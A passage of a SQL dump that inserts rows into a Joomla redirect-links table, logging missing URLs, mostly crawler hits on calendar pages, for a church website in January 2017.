(2340, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/3/-', NULL, '', '', 1, 0, '2017-01-20 10:59:10', '0000-00-00 00:00:00', 301),
(2341, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/9/9/-', NULL, '', '', 1, 0, '2017-01-20 11:03:01', '0000-00-00 00:00:00', 301),
(2342, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/12/-', NULL, '', '', 1, 0, '2017-01-20 11:06:53', '0000-00-00 00:00:00', 301),
(2343, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/12/-', NULL, '', '', 1, 0, '2017-01-20 11:10:26', '0000-00-00 00:00:00', 301),
(2344, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/25/-', NULL, '', '', 1, 0, '2017-01-20 11:14:12', '0000-00-00 00:00:00', 301),
(2345, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/27/-', NULL, '', '', 1, 0, '2017-01-20 11:18:00', '0000-00-00 00:00:00', 301),
(2346, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/10/-', NULL, '', '', 1, 0, '2017-01-20 11:21:48', '0000-00-00 00:00:00', 301),
(2347, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/10/-', NULL, '', '', 1, 0, '2017-01-20 11:25:34', '0000-00-00 00:00:00', 301),
(2348, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1859/11/-', NULL, '', '', 1, 0, '2017-01-20 11:29:26', '0000-00-00 00:00:00', 301),
(2349, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/1/-', NULL, '', '', 1, 0, '2017-01-20 11:33:20', '0000-00-00 00:00:00', 301),
(2350, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/9/-', NULL, '', '', 1, 0, '2017-01-20 11:37:00', '0000-00-00 00:00:00', 301),
(2351, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/8/-', NULL, '', '', 1, 0, '2017-01-20 11:40:43', '0000-00-00 00:00:00', 301),
(2352, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/1/-', NULL, '', '', 1, 0, '2017-01-20 11:44:31', '0000-00-00 00:00:00', 301),
(2353, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/3/-', NULL, '', '', 1, 0, '2017-01-20 11:48:14', '0000-00-00 00:00:00', 301),
(2354, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/13/-', NULL, '', '', 1, 0, '2017-01-20 11:52:03', '0000-00-00 00:00:00', 301),
(2355, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/25/-', NULL, '', '', 1, 0, '2017-01-20 11:55:49', '0000-00-00 00:00:00', 301),
(2356, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/23/-', NULL, '', '', 1, 0, '2017-01-20 11:59:39', '0000-00-00 00:00:00', 301),
(2357, 'http://www.lifeoasisinternationalchurch.org/component/k2/itemlist/category/', NULL, '', '', 2, 0, '2017-01-20 12:35:40', '0000-00-00 00:00:00', 301),
(2358, 'http://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/', NULL, '', '', 2, 0, '2017-01-20 14:58:51', '0000-00-00 00:00:00', 301),
(2359, 'http://www.lifeoasisinternationalchurch.org/component/k2/item/', NULL, '', '', 2, 0, '2017-01-20 15:19:18', '0000-00-00 00:00:00', 301),
(2360, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 4, 0, '2017-01-20 16:54:32', '0000-00-00 00:00:00', 301),
(2361, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 4, 0, '2017-01-20 17:07:23', '0000-00-00 00:00:00', 301),
(2362, 'http://lifeoasisinternationalchurch.org/template-info-2/our-belief', NULL, '', '', 12, 0, '2017-01-20 17:35:53', '0000-00-00 00:00:00', 301),
(2363, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1856/2/-', NULL, '', '', 1, 0, '2017-01-20 20:12:59', '0000-00-00 00:00:00', 301),
(2364, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/16/-', NULL, '', '', 1, 0, '2017-01-20 20:13:17', '0000-00-00 00:00:00', 301),
(2365, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/19/-', NULL, '', '', 1, 0, '2017-01-20 20:13:27', '0000-00-00 00:00:00', 301),
(2366, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/2/20/-', NULL, '', '', 1, 0, '2017-01-20 20:13:37', '0000-00-00 00:00:00', 301),
(2367, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/21/-', NULL, '', '', 1, 0, '2017-01-20 20:13:57', '0000-00-00 00:00:00', 301),
(2368, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/19/-', NULL, '', '', 1, 0, '2017-01-20 20:14:07', '0000-00-00 00:00:00', 301),
(2369, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/12/-', NULL, '', '', 1, 0, '2017-01-20 20:14:17', '0000-00-00 00:00:00', 301),
(2370, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/2/15/-', NULL, '', '', 1, 0, '2017-01-20 20:14:27', '0000-00-00 00:00:00', 301),
(2371, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/12/-', NULL, '', '', 1, 0, '2017-01-20 20:14:37', '0000-00-00 00:00:00', 301),
(2372, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/4/-', NULL, '', '', 1, 0, '2017-01-20 20:14:47', '0000-00-00 00:00:00', 301),
(2373, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/25/-', NULL, '', '', 1, 0, '2017-01-20 20:14:57', '0000-00-00 00:00:00', 301),
(2374, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/10/-', NULL, '', '', 1, 0, '2017-01-20 20:15:07', '0000-00-00 00:00:00', 301),
(2375, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/11/-', NULL, '', '', 1, 0, '2017-01-20 20:15:17', '0000-00-00 00:00:00', 301),
(2376, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/11/-', NULL, '', '', 1, 0, '2017-01-20 20:15:27', '0000-00-00 00:00:00', 301),
(2377, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/30/-', NULL, '', '', 1, 0, '2017-01-20 20:15:38', '0000-00-00 00:00:00', 301),
(2378, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1856/5/-', NULL, '', '', 1, 0, '2017-01-20 20:15:47', '0000-00-00 00:00:00', 301),
(2379, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/6/-', NULL, '', '', 1, 0, '2017-01-20 20:15:57', '0000-00-00 00:00:00', 301),
(2380, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1856/12/-', NULL, '', '', 1, 0, '2017-01-20 20:16:07', '0000-00-00 00:00:00', 301),
(2381, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1866/11/-', NULL, '', '', 1, 0, '2017-01-20 20:16:17', '0000-00-00 00:00:00', 301),
(2382, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/18/-', NULL, '', '', 1, 0, '2017-01-20 20:16:27', '0000-00-00 00:00:00', 301),
(2383, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/11/-', NULL, '', '', 1, 0, '2017-01-20 20:16:38', '0000-00-00 00:00:00', 301),
(2384, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1856/11/-', NULL, '', '', 1, 0, '2017-01-20 20:16:48', '0000-00-00 00:00:00', 301),
(2385, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/9/-', NULL, '', '', 1, 0, '2017-01-20 20:16:58', '0000-00-00 00:00:00', 301),
(2386, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1854/5/-', NULL, '', '', 1, 0, '2017-01-20 20:17:08', '0000-00-00 00:00:00', 301),
(2387, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/8/-', NULL, '', '', 1, 0, '2017-01-20 20:17:18', '0000-00-00 00:00:00', 301),
(2388, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/21/-', NULL, '', '', 1, 0, '2017-01-20 20:17:28', '0000-00-00 00:00:00', 301),
(2389, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/9/-', NULL, '', '', 1, 0, '2017-01-20 20:17:39', '0000-00-00 00:00:00', 301),
(2390, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/29/-', NULL, '', '', 1, 0, '2017-01-20 20:17:51', '0000-00-00 00:00:00', 301),
(2391, 'http://www.lifeoasisinternationalchurch.org/resources/baptism/18-loic/50-young-achievers', NULL, '', '', 18, 0, '2017-01-20 20:23:36', '0000-00-00 00:00:00', 301),
(2392, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 3, 0, '2017-01-20 21:42:48', '0000-00-00 00:00:00', 301),
(2393, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&Itemid=626', NULL, '', '', 1, 0, '2017-01-20 22:22:42', '0000-00-00 00:00:00', 301),
(2394, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=59&Itemid=308', NULL, '', '', 2, 0, '2017-01-20 23:36:20', '0000-00-00 00:00:00', 301),
(2395, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=CSS3&Itemid=626', NULL, '', '', 1, 0, '2017-01-20 23:38:28', '0000-00-00 00:00:00', 301),
(2396, 'http://lifeoasisinternationalchurch.org/index.php/gallery', NULL, '', '', 7, 0, '2017-01-21 00:24:29', '0000-00-00 00:00:00', 301),
(2397, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=AudioJungle&Itemid=626', NULL, '', '', 1, 0, '2017-01-21 00:54:14', '0000-00-00 00:00:00', 301),
(2398, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=music&Itemid=775', NULL, '', '', 1, 0, '2017-01-21 02:10:01', '0000-00-00 00:00:00', 301),
(2399, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/18', NULL, '', '', 3, 0, '2017-01-21 02:28:23', '0000-00-00 00:00:00', 301),
(2400, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/gin', NULL, '', '', 3, 0, '2017-01-21 03:06:15', '0000-00-00 00:00:00', 301),
(2401, 'http://lifeoasisinternationalchurch.org/testimonies/icalrepeat.detail/2012/01/15/47/15/super-celebration-sunday-service', NULL, '', '', 1, 0, '2017-01-21 03:15:58', '0000-00-00 00:00:00', 301),
(2402, 'http://lifeoasisinternationalchurch.org/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 4, 0, '2017-01-21 06:09:54', '0000-00-00 00:00:00', 301),
(2403, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/9/-', NULL, '', '', 1, 0, '2017-01-21 06:12:57', '0000-00-00 00:00:00', 301),
(2404, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/9/11/-', NULL, '', '', 1, 0, '2017-01-21 06:13:02', '0000-00-00 00:00:00', 301),
(2405, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/17/-', NULL, '', '', 1, 0, '2017-01-21 06:13:07', '0000-00-00 00:00:00', 301),
(2406, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/9/16/-', NULL, '', '', 1, 0, '2017-01-21 06:13:17', '0000-00-00 00:00:00', 301),
(2407, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1854/3/-', NULL, '', '', 1, 0, '2017-01-21 06:13:27', '0000-00-00 00:00:00', 301),
(2408, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1853/4/-', NULL, '', '', 1, 0, '2017-01-21 06:13:36', '0000-00-00 00:00:00', 301),
(2409, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/11/-', NULL, '', '', 1, 0, '2017-01-21 06:13:46', '0000-00-00 00:00:00', 301),
(2410, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/10/-', NULL, '', '', 1, 0, '2017-01-21 06:13:56', '0000-00-00 00:00:00', 301),
(2411, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/9/14/-', NULL, '', '', 1, 0, '2017-01-21 06:14:06', '0000-00-00 00:00:00', 301),
(2412, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1853/1/-', NULL, '', '', 1, 0, '2017-01-21 06:14:15', '0000-00-00 00:00:00', 301),
(2413, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/12/-', NULL, '', '', 1, 0, '2017-01-21 06:14:25', '0000-00-00 00:00:00', 301),
(2414, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/17/-', NULL, '', '', 1, 0, '2017-01-21 06:14:34', '0000-00-00 00:00:00', 301),
(2415, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/7/-', NULL, '', '', 1, 0, '2017-01-21 06:14:44', '0000-00-00 00:00:00', 301),
(2416, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1854/11/-', NULL, '', '', 1, 0, '2017-01-21 06:14:54', '0000-00-00 00:00:00', 301),
(2417, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/26/-', NULL, '', '', 1, 0, '2017-01-21 06:15:02', '0000-00-00 00:00:00', 301),
(2418, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/28/-', NULL, '', '', 1, 0, '2017-01-21 06:15:11', '0000-00-00 00:00:00', 301),
(2419, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/22/-', NULL, '', '', 1, 0, '2017-01-21 06:15:20', '0000-00-00 00:00:00', 301),
(2420, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/27/-', NULL, '', '', 1, 0, '2017-01-21 06:15:29', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(2421, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1855/8/-', NULL, '', '', 1, 0, '2017-01-21 06:15:37', '0000-00-00 00:00:00', 301),
(2422, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/1/-', NULL, '', '', 1, 0, '2017-01-21 06:15:46', '0000-00-00 00:00:00', 301),
(2423, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/9/-', NULL, '', '', 1, 0, '2017-01-21 06:16:04', '0000-00-00 00:00:00', 301),
(2424, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/26/-', NULL, '', '', 1, 0, '2017-01-21 06:16:12', '0000-00-00 00:00:00', 301),
(2425, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/12/-', NULL, '', '', 1, 0, '2017-01-21 06:16:21', '0000-00-00 00:00:00', 301),
(2426, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/6/-', NULL, '', '', 1, 0, '2017-01-21 06:16:30', '0000-00-00 00:00:00', 301),
(2427, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/11/-', NULL, '', '', 1, 0, '2017-01-21 06:16:47', '0000-00-00 00:00:00', 301),
(2428, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/10/-', NULL, '', '', 1, 0, '2017-01-21 06:16:56', '0000-00-00 00:00:00', 301),
(2429, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1866/1/-', NULL, '', '', 1, 0, '2017-01-21 06:17:05', '0000-00-00 00:00:00', 301),
(2430, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/12/-', NULL, '', '', 1, 0, '2017-01-21 06:17:14', '0000-00-00 00:00:00', 301),
(2431, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/16/-', NULL, '', '', 1, 0, '2017-01-21 06:17:23', '0000-00-00 00:00:00', 301),
(2432, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/1/-', NULL, '', '', 1, 0, '2017-01-21 06:17:32', '0000-00-00 00:00:00', 301),
(2433, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/24/-', NULL, '', '', 1, 0, '2017-01-21 06:19:36', '0000-00-00 00:00:00', 301),
(2434, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/1/-', NULL, '', '', 1, 0, '2017-01-21 06:22:19', '0000-00-00 00:00:00', 301),
(2435, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/3/-', NULL, '', '', 1, 0, '2017-01-21 06:26:06', '0000-00-00 00:00:00', 301),
(2436, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/2/-', NULL, '', '', 1, 0, '2017-01-21 06:33:41', '0000-00-00 00:00:00', 301),
(2437, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/14/-', NULL, '', '', 1, 0, '2017-01-21 06:37:28', '0000-00-00 00:00:00', 301),
(2438, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/2/-', NULL, '', '', 1, 0, '2017-01-21 06:41:14', '0000-00-00 00:00:00', 301),
(2439, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/29/-', NULL, '', '', 1, 0, '2017-01-21 06:45:01', '0000-00-00 00:00:00', 301),
(2440, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/4/-', NULL, '', '', 1, 0, '2017-01-21 06:48:48', '0000-00-00 00:00:00', 301),
(2441, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/1/-', NULL, '', '', 1, 0, '2017-01-21 06:52:35', '0000-00-00 00:00:00', 301),
(2442, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/28/-', NULL, '', '', 1, 0, '2017-01-21 06:56:22', '0000-00-00 00:00:00', 301),
(2443, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/29/-', NULL, '', '', 1, 0, '2017-01-21 07:00:11', '0000-00-00 00:00:00', 301),
(2444, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/30/-', NULL, '', '', 1, 0, '2017-01-21 07:03:56', '0000-00-00 00:00:00', 301),
(2445, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/9/-', NULL, '', '', 1, 0, '2017-01-21 07:07:43', '0000-00-00 00:00:00', 301),
(2446, 'http://ljmti.lifeoasisinternationalchurch.org/images/logo-1.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 7, 0, '2017-01-21 07:10:57', '0000-00-00 00:00:00', 301),
(2447, 'http://ljmti.lifeoasisinternationalchurch.org/home/lifeoasi/public_html/ljmti/images/asom_reg.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 6, 0, '2017-01-21 07:10:57', '0000-00-00 00:00:00', 301),
(2448, 'http://ljmti.lifeoasisinternationalchurch.org/home/lifeoasi/public_html/ljmti/images/rapture.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 3, 0, '2017-01-21 07:10:58', '0000-00-00 00:00:00', 301),
(2449, 'http://ljmti.lifeoasisinternationalchurch.org/home/lifeoasi/public_html/ljmti/images/fathers.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 3, 0, '2017-01-21 07:10:59', '0000-00-00 00:00:00', 301),
(2450, 'http://ljmti.lifeoasisinternationalchurch.org/images/gtcollection.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 4, 0, '2017-01-21 07:10:59', '0000-00-00 00:00:00', 301),
(2451, 'http://ljmti.lifeoasisinternationalchurch.org/images/fathter2.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 3, 0, '2017-01-21 07:10:59', '0000-00-00 00:00:00', 301),
(2452, 'http://ljmti.lifeoasisinternationalchurch.org/images/rapture1.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-21 07:11:00', '0000-00-00 00:00:00', 301),
(2453, 'http://lifeoasisinternationalchurch.org/index.php/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 1, 0, '2017-01-21 07:13:23', '0000-00-00 00:00:00', 301),
(2454, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 2, 0, '2017-01-21 07:50:09', '0000-00-00 00:00:00', 301),
(2455, 'http://lifeoasisinternationalchurch.org/index.php/programme/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 2, 0, '2017-01-21 08:25:24', '0000-00-00 00:00:00', 301),
(2456, 'http://www.lifeoasisinternationalchurch.org/loic-forum/8-newsflash/33-declaration-2', NULL, '', '', 1, 0, '2017-01-21 09:12:12', '0000-00-00 00:00:00', 301),
(2457, 'http://www.lifeoasisinternationalchurch.org/branches/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-01-21 09:43:53', '0000-00-00 00:00:00', 301),
(2458, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 6, 0, '2017-01-21 10:18:40', '0000-00-00 00:00:00', 301),
(2459, 'http://lifeoasisinternationalchurch.org/index.php/18-wifi-zion/33-wifizion-aims-objectives', NULL, '', '', 4, 0, '2017-01-21 10:34:11', '0000-00-00 00:00:00', 301),
(2460, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 7, 0, '2017-01-21 11:36:43', '0000-00-00 00:00:00', 301),
(2461, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/3', NULL, '', '', 3, 0, '2017-01-21 11:53:07', '0000-00-00 00:00:00', 301),
(2462, 'http://www.lifeoasisinternationalchurch.org/administrator/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/administrator/logo_img.php', '', 3, 0, '2017-01-21 12:47:51', '0000-00-00 00:00:00', 301),
(2463, 'http://www.lifeoasisinternationalchurch.org/resources/14-contact-us', NULL, '', '', 3, 0, '2017-01-21 13:22:55', '0000-00-00 00:00:00', 301),
(2464, 'http://lifeoasisinternationalchurch.org/58-prophetic-words-for-day-6', NULL, '', '', 2, 0, '2017-01-21 13:31:00', '0000-00-00 00:00:00', 301),
(2465, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/58-private', NULL, '', '', 7, 0, '2017-01-21 13:31:38', '0000-00-00 00:00:00', 301),
(2466, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/2', NULL, '', '', 3, 0, '2017-01-21 13:56:03', '0000-00-00 00:00:00', 301),
(2467, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/3-module-variations', NULL, '', '', 4, 0, '2017-01-21 15:02:10', '0000-00-00 00:00:00', 301),
(2468, 'http://www.lifeoasisinternationalchurch.org/loic-forum/2-uncategorised/3-vision', NULL, '', '', 1, 0, '2017-01-21 15:02:49', '0000-00-00 00:00:00', 301),
(2469, 'http://www.lifeoasisinternationalchurch.org/web/wp-content/plugins/easy-nivo-slider/3rd-party/', NULL, '', '', 1, 0, '2017-01-21 15:27:19', '0000-00-00 00:00:00', 301),
(2470, 'http://lifeoasisinternationalchurch.org/resources/kindom-builder/10-about-us', NULL, '', '', 1, 0, '2017-01-21 17:23:00', '0000-00-00 00:00:00', 301),
(2471, 'http://www.lifeoasisinternationalchurch.org/gobc2009/', NULL, '', '', 1, 0, '2017-01-21 18:08:04', '0000-00-00 00:00:00', 301),
(2472, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/30/-', NULL, '', '', 1, 0, '2017-01-21 18:53:41', '0000-00-00 00:00:00', 301),
(2473, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/20/-', NULL, '', '', 1, 0, '2017-01-21 18:53:54', '0000-00-00 00:00:00', 301),
(2474, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/19/-', NULL, '', '', 1, 0, '2017-01-21 18:54:15', '0000-00-00 00:00:00', 301),
(2475, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/12/-', NULL, '', '', 1, 0, '2017-01-21 18:54:21', '0000-00-00 00:00:00', 301),
(2476, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/23/-', NULL, '', '', 1, 0, '2017-01-21 18:54:48', '0000-00-00 00:00:00', 301),
(2477, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/4/-', NULL, '', '', 1, 0, '2017-01-21 18:55:02', '0000-00-00 00:00:00', 301),
(2478, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/15/-', NULL, '', '', 1, 0, '2017-01-21 18:55:15', '0000-00-00 00:00:00', 301),
(2479, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/12/-', NULL, '', '', 1, 0, '2017-01-21 18:55:28', '0000-00-00 00:00:00', 301),
(2480, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/29/-', NULL, '', '', 1, 0, '2017-01-21 18:55:42', '0000-00-00 00:00:00', 301),
(2481, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/19/-', NULL, '', '', 1, 0, '2017-01-21 18:55:53', '0000-00-00 00:00:00', 301),
(2482, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/25/-', NULL, '', '', 1, 0, '2017-01-21 18:56:07', '0000-00-00 00:00:00', 301),
(2483, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/13/-', NULL, '', '', 1, 0, '2017-01-21 18:56:19', '0000-00-00 00:00:00', 301),
(2484, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/18/-', NULL, '', '', 1, 0, '2017-01-21 18:56:44', '0000-00-00 00:00:00', 301),
(2485, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/10/-', NULL, '', '', 1, 0, '2017-01-21 18:56:56', '0000-00-00 00:00:00', 301),
(2486, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/16/-', NULL, '', '', 1, 0, '2017-01-21 18:57:13', '0000-00-00 00:00:00', 301),
(2487, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/21/-', NULL, '', '', 1, 0, '2017-01-21 18:57:20', '0000-00-00 00:00:00', 301),
(2488, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/6/-', NULL, '', '', 1, 0, '2017-01-21 18:57:33', '0000-00-00 00:00:00', 301),
(2489, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/27/-', NULL, '', '', 1, 0, '2017-01-21 18:57:44', '0000-00-00 00:00:00', 301),
(2490, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/6/-', NULL, '', '', 1, 0, '2017-01-21 18:57:56', '0000-00-00 00:00:00', 301),
(2491, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/20/-', NULL, '', '', 1, 0, '2017-01-21 18:58:08', '0000-00-00 00:00:00', 301),
(2492, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/25/-', NULL, '', '', 1, 0, '2017-01-21 18:58:19', '0000-00-00 00:00:00', 301),
(2493, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/13/-', NULL, '', '', 1, 0, '2017-01-21 18:58:31', '0000-00-00 00:00:00', 301),
(2494, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/6/-', NULL, '', '', 1, 0, '2017-01-21 18:58:42', '0000-00-00 00:00:00', 301),
(2495, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/9/-', NULL, '', '', 1, 0, '2017-01-21 18:58:53', '0000-00-00 00:00:00', 301),
